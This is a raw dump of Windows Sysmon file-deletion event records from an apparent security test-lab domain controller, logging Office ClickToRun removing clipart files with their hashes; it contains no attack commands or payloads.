23542300x800000000000000065304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CRANE.WMFMD5=7D5EC2FB4ED1F8F1F6476CC3BAAD270E,SHA256=A64E76FFA56D7F7605C6FF2A5ADC0F8744AE58DAAB52B7100BE6BD80A6377E94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CMNTY_01.MIDMD5=76A899E2617A599CC044F76A049AC7A5,SHA256=1DA2EAB2F5B0E9A6EA4FCE236FCD08ECCB26183B4995DBAB0C2791CB154D7ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CLIP.WMFMD5=8104FD9C4BFDD04F7CD0AC2B4234881C,SHA256=D76DDE03FB2B883327B491BE2A18E2CC6C7A386C7EBE06F328C9184B541E96D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CLASSIC2.WMFMD5=8D35E39DE31B5DF0EB8CEAC92FCB34FA,SHA256=07148EFC9CD22EF8AB508474728CB0D6FE12AC34354770223DD36F9CA5D2A909,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CLASSIC1.WMFMD5=2CF1DBC243A29FC3FF788E985B40E207,SHA256=4AEE5EAF4BE69B2A3234DCFC9DF03E090A7D02B142A69EB29A12066585E9E9E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CG1606.WMFMD5=88E74ECAABF1367BC04F960FBC66448F,SHA256=1257428A1292BDF90626A66020230926590D9B06C75B28C424E9125AB5F52624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\CARBN_01.MIDMD5=33BF6B0E81B4EB7E48F71DF1C1788078,SHA256=62C3A13B3B580D849AA2E6363C59E0C8AA4C4848D3C314BAF7EDEBACF7DFD358,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01639_.WMFMD5=1F0568821824452AD134E686000FCBB1,SHA256=73BB3CF029A20F0534046EDA4B0DD35D7C32CDD7AFD8AF727800D059DAC524F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01638_.WMFMD5=59FF330744D12C9FD1CF43DB0890727B,SHA256=E7EA56B18178DB02C4C0EF3E8B2EE21B428A39B4653D95B5340AD8D13C72D64A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01637_.WMFMD5=43813977F5397B6A8B66867DA7CB5837,SHA256=172EB4D73A73CB867C2092158694607A26F70229CC3D5193E12EEBD66D9473BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01636_.WMFMD5=A7825DA4D71020AE27440890252281B6,SHA256=AFAC579FB6C345E12F6AB6D8C4DCA45A3C3713CE3219A2F8743FCCD6372A4FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01635_.WMFMD5=ABA7178DFFF6476D6BEC901E9579B559,SHA256=DF655623DC4FA6464168903D1DA94483DE61F61605949643AF6FD4F5C601B459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01634_.WMFMD5=AFA305A78649F4E51ADE9748E231217F,SHA256=1D44EA89186238226231D3B531211C9AD6849E0389BCDDEA13EC88518874E773,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01603_.WMFMD5=2B5BE68773C1D459A636F5A24057447F,SHA256=6BF648BC2C000F5D3EDCB99A10A0FFBBE5A538C5A573F8FD7CB663157B0BF4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS01080_.WMFMD5=8EEF51840801D67057223D696FBB0FED,SHA256=BB7D98DCE9C6F081202C6F6B9B7D11629EBC6A7F0A2AE2E1C66DC8CA172CCDD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00453_.WMFMD5=6BF7FDF5412AC428DF3E1585445943D2,SHA256=7F40480D6FA89A2A998068290237C521698D6FF74C726861C88F57697F7140BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00445_.WMFMD5=76C44D5AE4B6326F83271F9218E34B19,SHA256=8F855699FADEB0EC35E4AB21ACFB337B18B698EA3B5CB9B87C35CB56E03507BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00444_.WMFMD5=A8B016D827AD838B1C3EAAB948DC0F61,SHA256=1F0BD1FAE758958CFC1C12B550996A7EC55A33284E9305D8B7C88E826CC1E871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00443_.WMFMD5=0439CE5865E4056B1F913AF29417DEFB,SHA256=E0EFE17ABDB695D0B5388CE94CF4A73302B0440F0479FB216AD706B32332CE20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B833083C73DFF4699EE64E2FEB313A16,SHA256=D2CD444B558D4943AB3BA9343BDD4943B867BE726DE9062C1CE52BF67B865197,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00442_.WMFMD5=67BB32B0BD8CB6096E41729B2B21EDAF,SHA256=ECA876F65B897697CE7C00424D6A41BF297894FA2E54C56034032B2F85BB8733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00441_.WMFMD5=078E1941D735AEE75A3699F2A3C61F98,SHA256=E882A2C9EDCF189AC18C955880160B15DB30D40999EAE2B2E79AE7E1AEFF708E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00440_.WMFMD5=0DE3A6D6362B3D0F91FE016F4419CE89,SHA256=E28C68D601EE32B97525FA2551D329A6436E47054655367B7EA2ADB74DB84269,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00439_.WMFMD5=F1BDD54C50CB8309E2163828ACA5BA41,SHA256=5C987FEE4F22B745325A57317033401BE0EAC88B9FACCCD102221F0A6A1C5F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00438_.WMFMD5=EAB2752C2FCCB0774767C4425599D767,SHA256=AC615B8E751D85718FFF7020D0E4CD9AA68E6B348D48B9828D48C26C6A3223BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00224_.WMFMD5=25A1BC3E581691E6717E238CE4D4E55D,SHA256=F97382DBF846510938134FD2848AE4ABDD0296A9BD5414532B1873A775302E41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00200_.WMFMD5=477B6CB3D27F2A87527AB36A885240E3,SHA256=F3A4CBDFB459B2C713F005F5D13C3B58C76FBF7E0334CF45DB37F5241E330023,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00186_.WMFMD5=314AE4BFC1C78603EA771341AF0B0BA8,SHA256=A2AD0B12D519FBC27D094DBD301EAE38D647EDDAA8ECD25C1BA1C55835AE93D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00184_.WMFMD5=B3E90220FDAA15E80F2AA4FCA04A2D22,SHA256=2B9CC93E527C11DFF9E0DB2075B644816F591F4E6A375A0F55307F74FD17F047,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00174_.WMFMD5=82D795FBEB8F4AA459BFA28556C5A717,SHA256=3184D2E7AA1A66373DD6CBEAE7AF32BB54CD6889E4A8C465D0662EEB175D4952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00145_.WMFMD5=64DE8DDC73C724A33299A96D6A4BB096,SHA256=8904C31178048279DEC102B7DB0054DA2C0A7D29FC24535EAFB0356A06712290,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00136_.WMFMD5=F9630705DEC83435D5A1EEBE6535B261,SHA256=709F8BD68E4750CD823131B2562971559BD75F7163522E3425D9CF11B8831596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00135_.WMFMD5=662E995B4D88C93D612113280FBBDECD,SHA256=BFC638EF5D06CC2A6457220C057825A893A51ABDBD14054F2344B58D42427C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00100_.WMFMD5=6B776676C9ED054D1105995ABD158819,SHA256=76AC2780BE3C83C93695C5A995D8C95F76DBF1BCCA50479FBB86CF8FB22D5193,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00092_.WMFMD5=113D2B1F87DB6E8614F69CEC18406EE7,SHA256=DD95225718517D43DF93BD1E1E4A46AD5D562BF3229786ABE77F318CFF4309FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00078_.WMFMD5=BB74A8D6C108E3815DBE89C164804FAD,SHA256=9F52EA86EBA7BC8A9C9D8D6481C7054D64D445F8F70C59B2F6CCBCB5BA663EE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BS00076_.WMFMD5=EF8D565BCE61D1661E27B001C87A0421,SHA256=0B2B33E18C2CE4759138757D56708D3612DEB3ECFB3CA18C34B44975CF8F40DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BOATINST.WMFMD5=C6BB70FFC5B41225F46F4799A7DD068A,SHA256=A058110E0F1497BF913D86B48FB3F2451C4F04BBD388EC80DF31896B4C871147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BOAT.WMFMD5=E1F3724B86447D322C844F75B11AC8C5,SHA256=03B29E8AEA29B712B5A6FFAF812207E3DCA31B3128FE78748801D8DB2E6EC9D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00985_.WMFMD5=6A57F5394FFC9D306C7C4CA9308E27C3,SHA256=2CF1D816E803CB5DBDB3B9CEC0E63B8F7E893A9670FE0F9A84BE2A1EC68AC7A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00932_.WMFMD5=A19A9A98872F20D95F1C501DEFA33F58,SHA256=F2871BF35867D805C2267D15FD034A1F230B40CA025D89350E8DE1D7DD7871E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00923_.WMFMD5=11EE6538E787DFDBA0654464073EB752,SHA256=F9407AFFB34FDE669D8F4473653490ADE152871A933C30448903D20775BBCD1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00921_.WMFMD5=64DD23FC6A1D43AA096B0CA3B1B7F033,SHA256=7FB3CD2B1D2E18C090E22BD2EAF29BCA213EDDCD00CEDA465649718678441FF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00648_.WMFMD5=8FFBD47538407A6FBBFE2BD7FCEB0661,SHA256=230A376BFC5C8168B68D6278DD8D164067E9551CA8E9D4363B8A69EF10F2D7A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 